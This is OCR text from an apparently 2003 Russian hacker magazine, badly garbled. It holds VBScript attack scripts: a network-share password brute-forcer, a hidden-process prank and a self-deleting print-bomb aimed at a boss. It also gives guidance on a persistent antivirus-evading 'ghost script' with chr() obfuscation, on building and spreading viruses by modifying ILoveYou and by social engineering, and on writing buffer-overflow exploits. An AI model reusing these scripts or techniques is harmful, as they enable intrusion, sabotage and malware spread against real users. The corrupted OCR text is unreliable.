<?xml version="1.0" епсо4пд="150-8859-1"?> 
<job id="TI"> 

<script language="VBScript"> 

<IECDATAT 

‘Kak написано выше - необходимое 
XML-ocpopmneHue 


Можно удалить файл скрипта 
gO завершения его работы. 


в VBScript, является Variant. Сам 
VBScript не имеет прямых инструк- 
ций, позволяющих читать или запи- 
сывать файлы на диске, выводить 
информацию в командную строку, 
изменять записи в реестре и т.д. Что- 
бы справиться с такими задачами, 
нужно воспользоваться дополни- 
тельными СОМ-объектами. Ряд таких 
объектов входит в поставку WSH, а 
один из них, WScript, даже уже имеет 
созданный экземпляр, и им можно 
пользоваться непосредственно, без 
предварительного создания. Осталь- 
ные создаются с помощью функции 
WScript.CreateObject. Например: 


Set fso = 
WScript.CreateObject(“Scripting.FileSystem0 
bject") 

‘Получить доступ к файловой сис- 
теме. 

Set txtstream = 
fso.opentextfile(“file.txt” 8, true) 

‘ Открыть файл на запись. Если 
файла не существует - создать его. 
txtstream.WriteLine “Hello, Word!" 


Option explicit 

Dim x1,x2,x3,x4,x5,xX6,x7,X8,x9 

‘Какая длина пароля - столько и 
символов. 

Dim GetNetwork,WshNetwork,fso,pst,pas- 
sout, PassLog 

Dim machine, sharez, diskletter, UserzName 
'Забиваем переменные для систем- 
ных объектов. 


Set WshNetwork = 
CreateObject(“WScript.Network") 

Set fso = 
wscript.CreateObject(“Scripting.FileSystem0 
bject") 

Set passout = 
fso.opentextfile(PassLog,2,true) 
‘Подключаем системные объекты 


machine = “\\WorkstationName” 

‘Uma компьютера с зашаренным pe- 
сурсом - его ты видишь в Сетевом 
окружении. 

sharez = “\d" 

‘ViMa зашаренного ресурса - его ты ви- 
дишь при клике на удаленном компе. 
diskletter = “X:" 


‘Main, в который будет записан 
найденный пароль. 


‘Это процедура формирования ва- 
риантов пароля. 

sub passgen() 

for x1=32 to 255 

for x2=32 to 255 

for x3=32 to 255 

for x4=32 to 255 

‘Пояснения: 

‘Какая длина пароля - столько и 
вложенных циклов. Значения пере- 
менных X1-x4 - это коды подбирае- 
мых символов. Например, если точ- 
но знаешь, что пароль состоит 
только из цифр - изменяй диапа- 
зон цикла 

pst=chr(x1) & chr(x2) & chr(x3) & chr(x4). 

'А здесь собирается строка пароля 
из отдельных символов. Например, 
если знаешь, что первый символ 


пят 


пароля -"q", то вместо chr(x1) подс- 
тавляй “4”, а цикл с переменной х1 
просто удали. 

call show() 

'Вызываем процедуру обработки 
полученного варианта пароля. 
wscript.sleep 1 

‘Снижаем пинг - пауза между по- 
пытками в миллисекунодах. 
‘Впрочем, эту строку можешь не 
указывать. 

next 

next 

next 

next 

end sub 


‘A это сама процедура подбора пароля. 


sub show() 

On Error Resume Next 

'Включаем обработчик ошибок. 
WshNetwork.MapNetworkDrive diskletter, 
machine & sharez, “false”, UserzName, pst 
‘Пытаемся подключить ресурс. 
ErrCheck Err.Number 

end sub 


‘Процедура обработки ошибок. 
Sub ErrCheck(nr) 

Select Case nr 

Case 0 

'Если ошибки не произошло - па- 
роль верный. 

passout.WriteLine “Resource mapped at 
password:” & pst 

‘Пишем в лог полученный пароль. 
passout.close 
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petra 
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Скрипты для 
Windows Script 
Host могут 
быть He толь- 
ко отдельны- 
ми программа- 
ми, HO и 
встраиваться 
в НТМЕ-стра- 
ницы. 


При изменении 
ключей реест- 
ра, используя 
ВЕС файл, вы- 
водится два 
диалоговых 
окна. При ис- 
пользовании 
WSF файла - 
ни одного. 


уэечу ISO 
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Программа 3a- 
пускается в 
“невидимом” 
режиме, т.е. о 
ее присут- 
ствии можно 
узнать лишь 
по CTRL-ALT- 
DEL. 


] Возможно соз- 


дание так на- 
зываемого 
“скрипта- 
призрака"'. 


раде 


WSH выдает достаточно информативные 
сообщения об ошибках кода 


‘Закрываем сфайл nora. 

set passout = nothing 
WshNetwork.RemoveNetworkDrive diskletter 
‘Заметаем следы. 

WScript.Quit 

'Завершаем работу скрипта. 

Case Else 

‘При неверном пароле блокируем 
вывод сообщения об ошибке. 
‘Ничего не происходит. Сканирова- 
ние продолжается. 

End Select 

End Sub 


call passgen 


‘Запускаем сценарий на выполнение. 


‘Закрываем XML структуру. 
1 

</script> 

</job> 


Переборщик будет работать go об- 
наружения пароля или перезагруз- 
ки. При желании и небольшом зна- 
нии языка его можно улучшить. 
Например, поместить в автозагруз- 
ку и начинать подбор с последнего 
варианта. Или разобраться с паро- 
лями неизвестной длины. Это уже 
зависит от тебя и твоей фантазии. 


БЫЛ P4, СТАЛ - 1486 

Ситуация вторая: твой сосед достал 
тебя своими рассказами о том, ка- 
кая у него навороченная тачка и 
как у него бегают игрушки. Докажи 
ему обратное ;). Пиши следующий 
код: 


<?xml version="1.0" encoding="IS0-8859-1"?> 
<job id="T1"> 

<script language="VBScript"> 

<IICDATAL 

Option explicit 

Dim ProgName 


ProgName="notepad" 

‘B кавычках указать ПОЛНЫЙ путь 
к нужной программе/файлу, напри- 
мер, “C\Program files\Quake\ 
Quake.exe”, а лучше просто 
“Quake.exe”, а сам скрипт помести с 
ним в одну папку. 
WScript.CreateObject(“WScript.Shell”).Run 
ргодпате,0 

Вся фишка состоит в том, что атри- 
бут “О” в последней строке кода 
указывает на то, что программу на- 
go запускать в “невидимом” режи- 
ме, т.е. о ее присутствии можно уз- 
нать лишь по CTRL-ALT-DEL. При 
желании помести эту строчку в 
трех- (четырех-, пяти-... :)) кратный 
цикл, а ссылку на сценарий - в ав- 
тозагрузку. И возрадуется тогда 
приятель такому “ускорению” ком- 
па. И востребуешь ты с него мага- 
рыч за устранение глюков :). 


ПРЕВРАЩАЕМ ПРИНТЕР В РАБА 
Ситуация третья: твой любимый на- 
чальник имеет мудрость оставлять 
в свое отсутствие включенный 
принтер с полным лотком бумаги? 


С помощью скриптов можно имитировать 
любое системное сообщение 


Дай ему возможность насладиться 
дружеским шаржем, автобиографи- 
ей в вольной трактовке или произ- 
ведением искусства - бессмертным 
творением Малевича - тиражом 
эдак в пятьсот экземпляров! Наби- 
рай этот скрипт: 


<?xml version="1.0" епсоФпд="150-8859-1"?> 
gob id="T1"> 

<script language="VBScript"> 

<IECDATAL 

Option explicit 

Dim owshshell, x 

Dim scriptname,fso 

Dim ProgName, filename, amount 
ProgName="paint.exe” 


re 


ЕЛЕ 07(32) 2003 


с ЧжаааачаЕ и 


SS. 


Рунетовский сайт, посвященный 
Windows скриптам 


‘В кавычках указать путь к pacne- 

чатывающей программе. 

filename="file.bmp” 

‘B кавычках указать ПОЛНЫЙ путь к 

распечатываемому файлу. Можешь 

дать распечатываемому файлу лю- 

бое имя и расширение, главное - 

правильно указать его в скрипте. 

amount=500 

‘Количество копий. 

set owshshell=WScript.CreateObject 

(“WScript.Shell”) 

set fso=CreateObject(“Scripting. 
FileSystemObject") 

if weekday(now)=VBmonday Then 

‘Проверка Ha дату. В данном случае 

- понедельник. Поэкспериментируй. 

fso.Getfile(scriptname).Delete 

'Удаляем сам скрипт - тебе улики 

не нужны ;). 

wscript.sleep 14400000 

‘Пауза в миллисекундах перед пер- 

вой распечаткой после запуска 

скрипта. 

‘Рассчитай промежуток от включе- 

ния компутера до перерыва в работе. 

for = 1 to amount 

owshshell.Run ProgName & “ /p " & file- 

name,0 

‘Cama распечатка. 

next 

End If 

Ip 

</script> 

</job> 


Хочешь распечатать текст? Пиши в 
скрипт вместо “mspaint.exe” - 
“notepad.exe”, а вместо bmp - txt 
файл. Теперь внедряй полученный 
файл в компьютер начальника (мож- 
но в автозагрузку). Процесс распе- 
чатки очень “демократичный” - без 
лишних вопросов и сообщений. 
После этого смело тряси с него баб- 
ки на “новый антивирусный пакет” :). 


УНИКАЛЬНАЯ ОСОБЕННОСТЬ 

В WSH присутствует очень полез- 
ная особенность: можно удалить 
файл скрипта go завершения его 
работы. То есть скрипт сидит в опе- 
ративке, а самого файла уже давно 
нет! Используя эту возможность, 
можно создать так называемый 
“скрипт-призрак”. 

Принцип действия скрипта-призра- 
ка такой: 

1. Скрипт загружается в систему 
ДО загрузки антивиря (фильт- 
ра/монитора). 
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Документация разработчикам 


от создателя WSH 


Это можно сделать, загружая его как сервис - из реестра: 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr 
entVersion\RunServicesOnce] 

“Script"="script.wsf” 

А лучше: 
[HKEY_USERS\.Default\SOFTWARE\Microsoft\Windows\Curren 
tVersion\RunservicesOnce] 

“Script"="script.wsf” 

В этом случае и CTRL-ALT-DEL в Win 9x/ME ничего He покажут. 
2. После этого он удаляет свое тело и ссылки на него из 
сфрайловой системы. 

3. Непосредственно работа самого скрипта. 

4. При обнаружении подготовки к перезагрузке/выключе- 
нию он восстанавливает свое файловое тело и ссылку в ав- 
тозагрузку. 

Антивирусы при проверке ничего не обнаруживают (по край- 
ней мере “DRweb" и “Касперский” у меня молчали). Возмо- 
жен перехват скрипта на 4 стадии, если монитор еще не выг- 
ружен. Однако антивирю предварительно можно "помочь" 
уйти с помощью TerminateProcess. В NT/2k/XP, конечно, по- 
надобятся права PROCESS_TERMINATE, но уж зато Ha Win 
Эх/МЕ никаких проблем не будет. Возможно, юзер и обратит 
внимание на процесс WSCript.exe, хотя, я уверен, что 90% 
его не заметят. Конечно, остается проблема сбоев/зависа- 
ний/внезапных перезагрузок, но и доступных возможностей 
порой бывает более чем достаточно. 


ЗАЩИТА OT УМНЫХ 

И, напоследок, любителям команд типа “format с: /u 
/autotest” или “Rundil32.exe keyboard,disable”. Первый по- 
павшийся антивирь схватит тебя за руку при попытке ис- 
пользования скрипта, содержащего такую строку. На момент 
написания статьи существовала возможность обойти это ог- 
раничение путем замены части команды Chr() - последова- 
тельностью. В качестве примера приведу фрагмент сцена- 
рия, отрубающего клавиатуру в Win9x: 


10) &c F100) ¢ & c 


8) & chr(108) 5 


Обрати внимание: пробел в кавычках в середине сНг()-цепоч- 
ки имеет решающее значение. Если же все-таки не повезло, 
то покомбинируй по принципу: chr()-uenouKa - несколько 
символов в кавычках - несколько переменных - ит.д. Глав- 
ное, чтобы в итоге получилась нужная строка. 

Удачи тебе в освоении WSH и VBScript. Если что-то непонят- 


но - можешь написать мне. До встречи. 


ИНТЕРНЕТ-МАГАЗИН 


e-sho 


http://www.e-shop.ru С ДОСТЯВнОй HA ДОМ 


‚ Процессор: 32-Bit ARM 

Память: 32-96 КВ VRAM (в CPU), 256 KB 
Экран: 2.9” ТЕТ с отражающей матрицей (40.8 
ммх 61.2 мм) ы 
Разрешение и цвет: 240х160 пикселей, 
32.768 возможных цветов 

Размеры (ШхВхТ): 144.5 x 82 x 24.5 мм 

Вес: 140 г 

Питание: 2 батареи класса АА (15 часов) 
Носители данных: картриджи 

Другое: Стереозвук, совместим с играми для 
Game Boy и Game Boy Color 


Технические спецификации только для GBA SP: 


* Интегрированная подсветка LCD экрана* Входящая в комплект перезаряжаемая Lithium 
lon батарея, способная работать 10 часов безостановочной игры, заряжаемая всего 3 часа 
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ИНДЕКС. 


УЛИЦА. OM. КОРПУС. КВАРТИРА 


ФИО. 
ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 


НОМ/ТО/ВИРИ В ВЫНЬ 


ОЗы 4hack 


По адресу 
www.trendmi- 
cro.com/vinfo/ 
virusencyclo/ 
можно по наз- 
ванию или па- 
раметрам най- 
ти описание на 
англицком лю- 
бого виря, из- 
вестного науке. 


раде EET 


ПИШЕМ САМИ, ЮЗАЕМ ЧУЖИЕ 
И ГРАМОТНО ПОДСАЖИВАЕМ. 


5pik3 (fallout@pisem.net) 


ступление закончено, 

теперь посмотрим, как 

написать и заюзать 
свой вирус или воспользоваться 
чужими творениями :). 


ГОТОВЕНЬКОЕ 

Самый простой способ nogcagkn ви- 
ря на тачку - воспользоваться уже 
готовым вирусом. Тут в зависимости 
от класса виря, переносчиком будет 
уже зараженный исполняемый 
файл, макрос, скрипт, etc. Тебе ос- 
танется только залить этот файл на 
комп юзеру и запустить, или мето- 
дом «социальной инженерии» уго- 
ворить жертву сделать все самосто- 
ятельно, без твоей помощи. Плюсы 
этого подхода в том, что вообще не 
надо кодить, можешь выбрать необ- 
ходимый вирь из тысяч существую- 
щих по нужным тебе параметрам и 
ознакомится с инструкцией. Мину- 
сов намного больше. Такие файлы 
моментально ловятся любым анти- 
вирусом, а найти рабочий вирь, не 
занесенный в базы, практически не- 
реально, если ты, конечно, не близ- 
кий друг автора виря :). Вот тебе 
ссылка на неплохую базу вирусов: 
http://ulitka-forever.ru/ulitka2/ 
viruses.html. Вирей тут достаточно, 
но, в основном, валяются макрови- 
ри для MS офиса. По адресу 
http://vaulti3.dtn.ru/hack/prog/ 
virus.html находится еще один склад 
вирусов любых классов (с исходни- 
ками и конструкторами) и троянов. 
Конечно, с новинками довольно 
сложно, но базы лучше найти слож- 
но. Плюс многие вири и исходники 


Коллекция готовых вирей. 
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снабжены комментариями и нор- 
мальными описаниями на русском 
(база временно в дауне ;(, надеюсь, 
скоро починят). И последняя кол- 
лекция вирей: www2.coderz.net/ 
kalamar/virii.htm - здесь, в OCHOB- 
ном, лежат скрипты и макровири. 


ФАБРИКА ВИРЕЙ 

Но, согласись, пользоваться чужи- 
ми вирями - мало интересного. Ко- 
нечно, каждому свое, но все-таки 
всегда лучше хотя бы попробовать 
что-то слепить своими руками, тем 
более вирь :). Да и как тогда про те- 
бя узнает весь мир, если даже и не 
пытаться? 

Про генераторы вирей уже как-то 
писали в Х. Да и вообще с ними 
проблем возникнуть не должно. 
Большинство генераторов сделаны 
для простого и интуитивно-понятно- 
го пользования. И теории тебе 
должно полностью хватить для то- 
го, чтобы понять, чего и зачем на- 
жимать для создания виря. Боль- 
шую коллекцию генераторов вирей 
ты можешь накачать с сайта WWW. 
ebcvg.com/category.php?cat=4&p=1. 
Тут залежи генераторов вирей лю- 
бых классов и на самый NpuBepeg- 


Всевозможные генераторы. 


ливый вкус :). Вот только подавляю- 
щее большинство вирей, созданных 
генераторами, быстро ловятся анти- 
вирусами. 


СДЕЛАЙ САМ 

Теперь придется потрудиться тебе 
самому по полной - будем писать 
вирь самостоятельно (смотри, что- 
бы не сбежал!). Учить тебя кодить A 
сейчас не буду, а только напишу 
про основы и принципы создания 
вирей, в остальном тебе поможет 


инет. 


Несколько генераторов вирей, 
которые я потестил. 


Написание файловых/загрузоч- 
ных вирей на асме - это для избран- 
ных. И если ты не Нео или Ноа и не 
знаком с ассемблером и тонкостями 
архитектуры мастдая, то забудь по- 
ка про это. 

Для написания червей или макро- 
вирей под вынь вполне сгодится 
Visual Basic - родной язык MS. Но не 
Visual Basic как таковой, а Visual 
Basic for Applications (для макросов) 
или VBScript (для червяков). A то, 
прям, анекдот получится - «Для ра- 
боты программы «l-Worm.X» необхо- 
дима библиотека Visual Basic». 

Для ознакомления с методикой 
написания червей полезно будет 
изучить исходники культовых за- 
раз. Для начала вполне сойдет ис- 
ходник ILoveYou. Помнишь, какой 
стрем разводили в новостях в свое 
время из-за эпидемии этого червя- 
ка? Исходники смотри на 
http://hacknews.boom.ru/zap/14.htm. 
Объем кода, как видишь, He такой 
уж и неподъемный. Если ты ру- 
бишь в бейсике, то постепенно 
просечешь функции всех участков 
кода, в этом тебе помогут коммен- 
тарии, которыми снабжен UCXOG- 
ник. Когда более или менее разбе- 
решься со структурой виря, попро- 
буй внести в код свои первые из- 
менения, вот только запускать я 
это пока не советую :). После всех 
преобразований натрави на червя 
антивирь, скорее всего сканер зая- 
вит, что это тот же самый вирус. 
Методом тыка найди строку кода, 
на которую ругается антивирус 
(сканер ищет в коде уникальную 
строку, присущую только данному 
вирусу) и замени ее на сходную 
конструкцию. Вот и готова твоя 
первая модификация виря, кото- 
рую не ловит сканер антивиря, мо- 
жешь открывать пиво. Правда воз- 
никает один облом: как проверить 
на работоспособность монстра, ко- 
торого ты сотворил. Если собира- 
ешься серьезно этим заниматься, 
то лучше выделить под экспери- 
менты отдельный раздел или це- 
лый BUHT, И никогда (!) не запускай 
вирь, пока не оценишь все воз- 
можные последствия и не прове- 
ришь каждый миллиметр кода. 

Написание макровирей аналогич- 
но. Нажимаешь в Ворде Alt+F8 и 
сразу попадаешь в редактор макро- 
сов, остальное уже зависит от тво- 
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Пишем макрос, 


ну или макровирь. 
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Энциклопедия вирей с удобным поиском. 


ей извращенности, воображения и 
навыков написание вирей. Одна из 
главных задач макровируса - 
влезть в стандартный шаблон (пог- 
mal.dot). Если получиться, то теперь 
инфицированным будет любой go- 
кумент, созданный на этом компе. С 
макровирусами относительно слож- 
но бороться из-за того, что в ворде 
по-левому (мягко сказано) сделана 
система безопасности макросов, ко- 
торая отключается изменением все- 
го одного параметра в реестре. И 
это далеко не единственная подоб- 
ная лажа. 


ВПАРИВАЕМ 

Вирус готов, остался последний 
шаг - впаривание его толпе потен- 
циальных жертв. И если на этом 
этапе появится розовая птица Об- 
ломинго и нагло насрет на все твои 
планы, то будет совсем неприколь- 
но. Честно говоря, развести сейчас 
юзера на «просто запусти файл», 
если он не в первый раз видит 
комп, крайне проблематично. Так- 
же давно почти не катят приколы с 
файлами с двойным расширением, 
типа super_porno.jpg.exe, хотя non- 
робовать можно. Да и в мыльце 
support@microsoft.com мало кто 
сегодня поверит :(. А вот мокрицу 
aka макрос впихнуть вполне реаль- 
но, так как gO сих пор находится 
множество догадливых индивидов, 
которые полностью уверены, что 
документы Ms word - это просто бе- 
зобидные текстики. Со втюхивани- 
ем вирей - главное придумать ори- 
гинальную идею и грамотно ее реа- 
лизовать. Но все эти попытки впа- 
ривания заразы зависят от такой 
штуки, как «человеческий fuck- 
тор»: юзер может запустить прож- 
ку, а может и наотрез отказаться, 
отрубиться от инета и спрятаться 
под подушкой. А это совсем не 
есть гуд. 
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РЕШЕТО 

Я думаю, ты не раз слышал и услы- 
шишь про то, сколько тысяч дыр 
уже нашли и еще найдут в решете 
под названием софт от MS. Этим-то 
и лучше всего пользоваться при 
распространении виря. Естествен- 
но, надо юзать самые последние 
уязвимости, заплатки к которым 
часто не успевают сделать, да и 
ставить эти заплатки своевременно 
будет далеко не каждый. Заходи на 
www.bugtraq.ru, http://www.gunins- 
ki.com/ browsers.html или любой 
другой сайт багов, который pery- 
лярно обновляется и ищи там опи- 
сание того, как использовать но- 
венькие дыры в почтовике Outlook 
или бродилке IE (осел тоже сгодит- 
ся, так как они с аутглюком пользу- 
ют несколько общих библиотек) на 
выполнение произвольного кода. 
Далее создавай HTML письмецо 


согласно уязвимости, приклеивай к Мануалы по 


нему аттач, который надо будет вы- и 
е прожек н 

полнить, и отправляи в свободное ан мо- 

плавание. жешь почи- 


тать на сай- 
тах: www.cit- 
forum.ru/inter- 
net/vbscript/v 
bscript.shtml 
(неплохой 
учебник) или 
www.webber.ru 
/articles/cate- 
gory.html?cat- 


Например, червяк Klez рассылался 
под видом лекарства против друго- 
го виря от Лаборатории Касперско- 
го, строил из себя патч для ослика 
6.0 и прочее, и прочее, и прочее. 
При этом он использовал дырку в 
аутглюке и создавал своему глав- 


ному файлу двойное расширение. ше 
Потому и расползся по всему нету и толковый 
справочник). 


стал самым массовым вирем за всю 
историю мироздания :). 


THE END 

Вот и все, что я хотел рассказать 
тебе по вирям. Надеюсь, это тебя 
подтолкнет на изучение чего-то но- 
вого для тебя, а не на крушение 
всего подряд. Удачи! 


АИ 
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НОМИТО/БОЛЬШОЕ В МАЛЕНЬКОМ 
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В МАЛЕНЬКОМ 


БУФЕР ЛОПНУЛ, КАК ЭТО ПОЮЗАТЬ? 


Vint(vint@townnet.ru) 


се началось не со 
зла, все началось как 
игра! (С) Ария 
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Первая сильная атака, основанная Ha он , = 
переполнении буфера, была реализо- Wind?-bufterheap overrun conditions rune 


Сейчас nepe- 
полнение бу- 


И вана с помощью известного червя сеиреты (EAS MOORS 

Menouarmux, | МОРриса аж B 1988 году нашей spb. В A ee eaeamene ieeascsene saeeie opens 
даже говорят, — Те времена основной сетевой OC был дББисНывНь, чеганыыы зафавыный ritebbadie Рыб звании nites 

что я най- Юних, и именно в его демоне (sendmail ола щеке Аль бы 
НН - отправка почты) была найдена воз- 

2003-х сер- можность вызвать buffer overflow. А Tae РЕД СТВА PHA СЭС Ван, 
oat о дальше количество таких атак росло, о Oa 


как снежный ком. Исследовались и на- 
ходились новый дырявые сосртины. 

Сегодня уязвимости и баги, связанные 
с так называемым переполнением сте- 
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ка или буфера, являются одной из ос- 
новных проблем сисадминов. В рас- 
сылках и на сайтах, посвященных ды- 
рам в защите сосфта, уязвимости тако- 
го рода составляют около 2/3 от об- 
щего числа. А простое наблюдение за 
событиями, происходящими сегодня в 
области сетевых технологий, дает все 
основания считать, что появилось и 
очень быстро растет целое поколение 
программ, называющими себя «БиНег- 
overflow exploits». Таких сосфтин мно- 
жество, но все они для прорыва в сис- 
тему и/или для получения прав рута 
используют глюки в контроле разме- 
ров строк и буферов. Причем пробле- 
ма давно вышла за рамки УМХ-сис- 
тем. Сейчас переполнение буфера 
очень актуально для всех ОС от мел- 
комягких, даже говорят, что уже най- 


Е oe 


бага была найдена на ЕТР-сервере 
«made in China» под управлением 
NT'WHoro мастдая. При подключе- 
нии к серверу на запрос пассворда 
передается строка: «pass 
AAAAAAA...» - больше 1024 (размер 
буфера) символов. Если в МТ"е нет 
глюка с переполнением, то ты уз- 
ришь мессаги об ошибке, и сервак 
продолжит общаться с другими 
юзерами, а если есть, то произойдет 
дисконнект, и, возможно, сервант 
вообще упадет. А дальше твое де- 
ло, что делать с такой находкой: со- 
общить админу или поиметь сервер! 
Другой способ поиска переполне- 
ний - анализ исходного кода или 


гие уязвимости можно найти толь- 
ко таким способом, да и то если 
просидишь несколько ночей над 
софтиной. Если в руках есть исход- 
ник проги, то все не так плохо. А 
если в наличии только бинарики, то 
поиск дыр превращается в боль- 
шой гем, так как без хорошего зна- 
ния асма и архитектуры проца багу 
ты не найдешь :(. 


КАК ЖЕ СИЕ РАБОТАЕТ? 

Как ты, наверное, уже понял, переза- 
пись возвратного адреса, который ва- 
ляется в регистре EIP проца (Instraction 
Pointer register - регистр-указатель ко- 
мана), позволяет нам юзать перепол- 


Самое прими- 
тивное пере- 
полнение бу- 
фера происхо- 
дит при работе 
со строками в 


нение буфера в своих темных целях :). 
Обычно, используя этот прием, ты зас- 
тавляешь проц выполнить код, кото- 

рый он при нормальной работе выпол- 


дизассемблирование программы, 
что требует наличия исходника или 
бинарика, умения программировать 
и дизассемблировать, и поэтому 


ден буфер oBepcpoB в 2003-х сервер- 
ных Виндах! И самое-то интересное, 
что эти баги не являются закрываемы- 
ми раз и навсегда! Переполнение бу- 


ГДЕ ЖЕ ТЫ, ГДЕ, 

ДЫРОЧКА МАЛАЯ! 

Сейчас мы попробуем найти ручка- 
ми это самое переполнение. Самое 
примитивное переполнение буфера 
происходит при работе со строками 
в текстовых протоколах (НТТР, 
SMTP, POP, FTP). Вот как можно Ha- 
ходить дырочки для входа: такая 
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sd bees cpepa - это уже некая технология, поз- — многим не понравится. Однако мно- — нять не должен. Ты можешь поместить 
проток x — - у 

(HTTP, $МТР, — ВОПЯЮЩая находить дыры там, где их в ЕР адрес, возвращающий проц об- 
POP, FTP). никогда не было :). ратно в буфер, чтобы исполнить те 


инструкции, которыми буфер перепол- 
нили (тот самый шелл-код, который 
был запихнут в стек как параметр для 
функции, например, login). 

А делается вся эта замутка с одной 
хитрой целью: МТ'шные винды, как и 
юнихи, используют политику учет- 
ных записей, то есть у каждого юзе- 
ра есть учетная запись, в которой 
прописаны права юзера на эту систе- 


му. У кого они выше, тот и крут. Так, 
в виндах самый крутой - Администра- 
тор, ау юнихов - Root. У всех осталь- 
ных юзеров права на систему гораз- 
до меньше. Tak вот, эти обездолен- 
ные, чтобы получить права админи- 
стратора, используют атаку на пере- 
полнение буфера. То есть перцу не- 
обходимо переполнить буфер в ка- 
ком-либо из процессов, запущенном 
с правами администратора или на 
системном уровне, перезаписать бу- 
фер своим кодом и выполнить его, 
тогда код простого юзера выполнит- 
ся с правами root’a, так как процесс 
запущен с админскими правами. 

В МТ'ях через овердоз буфера 
можно запустить командную строку 
с наивысшими правами «SYSTEM». 
Если процесс в Виндовс МТ создает 
дочерний процесс, то обычно ему да- 
ются права родителя. Однако неко- 
торые процессы могут создаваться с 
использованием Win32 функции 
CreateProcessAsUser (), которая соз- 
дает процесс-дочку от имени другого 
чела, а значит, это дите будет иметь 
такие же права, как и юзер, от имени 
которого его создали. Все это воз- 
можности для получения админских 
прав через переполнение буфера. 


ТРАБЛЫ ОВЕРДОЗА 

После теории топаем к практике. 

Основные моменты создания ЛЮ- 
БОГО эксплоита, юзающего дыру 
переполнения буфера, выглядят 

примерно так: 

1. Необходимо найти узкое место в 
программе или ОС. Это достигается 
либо анализом кода, либо баналь- 
ным методом научного тыка: «А что 
будет, если послать переменной не 
5, а 50 байт?» 

2. Дизассемблирование дырявого 
участка кода - необходимо для раз- 
ведки места дислокации баги. 

3. Небольшой анализ, куда лучше 
закинуть злостный код. 

4. Написание сего кода на асме. 
Соображение строки, переполняю- 
щей буфер, с учетом злостного ко- 
да, то бишь надо включить ссылку 
или сам код в строку переполнения. 

5. Написание софтины, которая 
автоматически переполняет буфер 
и передает управление твоему коду. 

И все! Сейчас у нас в руках гото- 
вый эксплоит, который работает 
очень просто: при запуске находит 
дырявое приложение, некими мани- 
пуляциями переполняет буфер 
(стек), а затем твой вредный кусо- 
чек в буфере получает управление. 

Немного расскажу о написании 
самого хитрого кусочка. Для созда- 
ния машинного кода, на который 
передаст управление переполнив- 
шийся буфер, надо: 

Во-первых, выяснить примерный 
адрес верхушки стека на данном 
компе при вызове функций, чтобы 
корректно сформировать адрес 
возврата, который попадет в поле 
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RETADR. Обычно эксплоиты выпол- 


няют это с помощью вызова пустой 
функции, возвращающей в качестве 
параметра значение верхушки стека. 
Во-вторых, кусок кода должен 
быть написан так, чтобы не содер- 
жать символа О, который будет по- 


а т 


а 


Е] 
с м 


== ры —_ БОИ 
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HAT, как конец строки, иначе этим 
символом твой кусочек и закончит- 
ся. Конечно, код попадет при копи- 
ровании в область параметров, но 
хакера это, как и испорченный ре- 
гистр ВР, не волнует. Главное, уп- 
равление будет передано на чуже- 
родный фрагмент. 

В-третьих, точно должны быть 
рассчитаны размеры буфера, что- 
бы все попало в нужные места и не 
вызвало обычного Core dump. Так- 
же надо учесть размеры других пе- 
ременных, стоящих между буфером 
и RETADR. 

И, наконец, в-четвертых, ты дол- 
жен уметь вызывать функции опе- 
рационной системы и знать необхо- 
димые для работы в лицо! 


МИФ ОБ УНИВЕРСАЛЬНОЙ 
ЗАЩИТЕ 

Недавно на В С-каналах и в Инете про- 
бегал слушок, что найдена универ- 
сальная защита (!) от абсолютно всех 
нюкеров и эксплоитов, основанных на 
переполнении буфера. Вот вкратце 
как это преподносилось: при перепол- 
нении стека выполняемый код также 
находится в стеке (а при нормальной 
работе ОС такого не бывает), и кому- 
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то, по слухам, нашему соотечествен- 
нику Solar Designer’y, пришла в голову 
мысль, что можно запретить исполне- 
ние кода, находящегося в стеке, что 
должно позволить навсегда решить 
проблему его переполнения. Этот па- 
рень оказался не только говоруном, 
но и низкоуровневым кодером, и, по- 
шаманив три дня и три ночи с особен- 
ностями процессоров Intel 586, реали- 
зовал идею в своем проекте OpenWall. 
Также существуют патч для ядра 
Linux'a - PAX, заложенный во многие 
дистрибутивы (например, в BlackCat) и 
коммерческий продукт под Windows - 
SecureStack (автор - другой наш со- 
отечественник). 

Но при кульном тестинге народ 
догнал, что это не есть выход! Ведь 
можно положить в стек данные та- 
ким макаром, что после возврата 
из процедуры ось начнет выпол- 
нять любые функции, принадлежа- 
щие основной программе, напри- 
мер, memcpy, и ее параметры будут 
находиться в стеке на положенных 
местах. В результате функция ско- 
пирует данные из стека в другую 
область памяти, где исполнение ко- 
да разрешено, а после возврата из 
нее управление будет передано в 
эту область памяти. Все! Универ- 
сальная защита от переполнения 
буфера накрылась :). 

Конечно, можно поспорить и попы- 
таться доказать, что есть более 
простые способы проникновения в 
систему, чем эксплоитинг переполне- 
ния буфера. Например, дать по баш- 
ке админу и отнять пароли или пос- 
лать трояна :). Но эти способы стары, 
грубы и неэффективны. Дать по 
башке админу смахивает на уголов- 
щину. А если помрет? Так потом с 
зеками будешь переполнение Gycpe- 
ра учить :). И троян - не выход, гра- 
мотные админы фильтруют почту на 
наличие коней и при получении при- 
бивают на месте. Но, кроме шуток, 
уже написана такая туча софта с не- 
дочетами кодинга, которые мгновен- 
но превращаются в лазейки для ха- 
кера (а релизится еще больше), что 
не юзать это минимум неразумно. 
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Обычно, ис- 
пользуя пере- 
полнение бу- 
фера, ты зас- 
тавляешь проц 
выполнить 
код, который 
он при нор- 
мальной рабо- 
те выполнять 
не должен. 


Недавно на 
1ВС-каналах и 
в Инете пробе- 
гал слушок, 
что найдена 
универсальная 
защита (!) от 
абсолютно 
всех нюкеров 
и эксплоитов, 
основанных на 
переполнении 
буфера. 
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ГНУТЫЙ СТВОЛ 


ПОПАДАЕТ ДВАЖДЫ: 


SPOOFER В ОКНАХ 


Alex Shark 
(qqqqqwww@e-mail.ru) 


Если стереть 
последний, за- 
вершающий па- 
кет (именно 
после него ма- 
шина начинает 
отвечать на 
пинг), то тачка 
будет хранить 
все остальные 
фрагменты, по- 
ка не истечет 
тайм-аут. В ло- 
калке это будет 
выглядеть веч- 
нозеленым гла- 
зом на хабе и 
сетевухе. На 
тачке чувству- 
ется явное тор- 
можение. При 
этом фаервол- 
лы грустно 
молчат, пос- 
кольку пакетов 
толком ни од- 
ного не пришло. 


Хорошо стрелять по сетке в контру, а представь, что ты можешь выстрелить из 


I авай постреляем, 
только не 
= нарисованными 
пульками, а реальными пакетами. 


МЕТХВАУ 

Для начала не мешает его поста- 
вить. Качать можно с 
http://msk.nestor.minsk.by/sr/down- 
